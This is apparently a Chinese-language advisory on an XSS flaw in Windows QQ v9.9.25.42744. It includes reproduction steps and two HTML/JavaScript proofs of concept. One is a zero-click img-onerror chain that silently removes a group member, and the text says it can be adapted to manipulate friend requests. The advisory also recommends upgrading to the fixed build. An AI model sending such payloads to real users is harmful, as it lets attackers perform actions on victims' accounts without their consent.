漏洞简介
腾讯QQ是一款基于互联网的通讯软件。除了实现即时通讯,QQ还具备许多强大的功能。腾讯QQ(互联网通讯软件) v9.9.25.42744 全新NT架构Windows版本中存在跨站脚本(XSS)攻击漏洞,该漏洞可能存在于处理用户输入或特定页面渲染的组件中。攻击者可以通过向受害者发送包含恶意脚本的消息或通过其他交互方式,在受害者的浏览器环境中执行任意脚本。成功利用此漏洞可能导致用户会话劫持、敏感信息(如Cookie、令牌)泄露、页面内容篡改,甚至在某些情况下可能进一步导致客户端系统被攻击者控制。
影响版本
WindowsQQ_9.9.25.42744_x64
漏洞复现
下载 WindowsQQ_9.9.25.42744_x64.exe 安装后,登录qq,随便找一个如发送携带html标签与js代码的poc即可测试,可通过按钮触发、亦可不需要交互,直接触发。
‹div><button onclick="alert('PC QQbug');">点击测试</button>< div>

还有初始TG频道流出POC如下
打开群设置菜单 -> 点击剔除“成员” -> 在列表中选择第一个人 -> 点击“确定”。
<div>
<button id="test" onclick="var list = document.documentElement.getElementsByClassName('panel-headeraction')[0].children[0];list.children[list.childNodes.length - 1].children[0].click();setTimeout(() => {var an = document.documentElement.getElementsByClassName('group-user--btn')[1];an.children[0].children[0].click();setTimeout(() => {var input = document.getElementsByClassName('relation-tree')[0].getElementsByClassName('viewport-listinner')[0].children[0].children[0].children[0];input.click();setTimeout(() => document.getElementsByClassName('selector-layout__right-area')[0].getElementsByClassName('q-button--primary')[0].click(), 0)}, 0)}, 1);"></button>
<img src="x" onerror="document.getElementById('test').click()">
</div>
这个流程的最终效果就是在用户不知情的情况下,将攻击者指定的一个人(在此POC中是列表里的第一个人)从群聊中删除。如果这个POC被稍加修改,也可以用于自动同意好友请求或主动向某人发送好友请求、删除你的好友等等。
所有在此版本的用户看到特定代码会自动在本机执行js代码,可能造成代码执行,理论上可执行任意js脚本,具有极高风险!请勿更新到本版本,已在此版本的用户请降级或升级至修复后的版本(Windows QQ v9.9.25.42905)。
后续
目前腾讯内部已知此漏洞,新下载的都是已经修复后的版本了,使用此版本的请尽快更新至最新版本(Windows QQ v9.9.25.42905)。
参考
https://t.me/NekoMirra/1526https://linux.do/t/topic/1234011


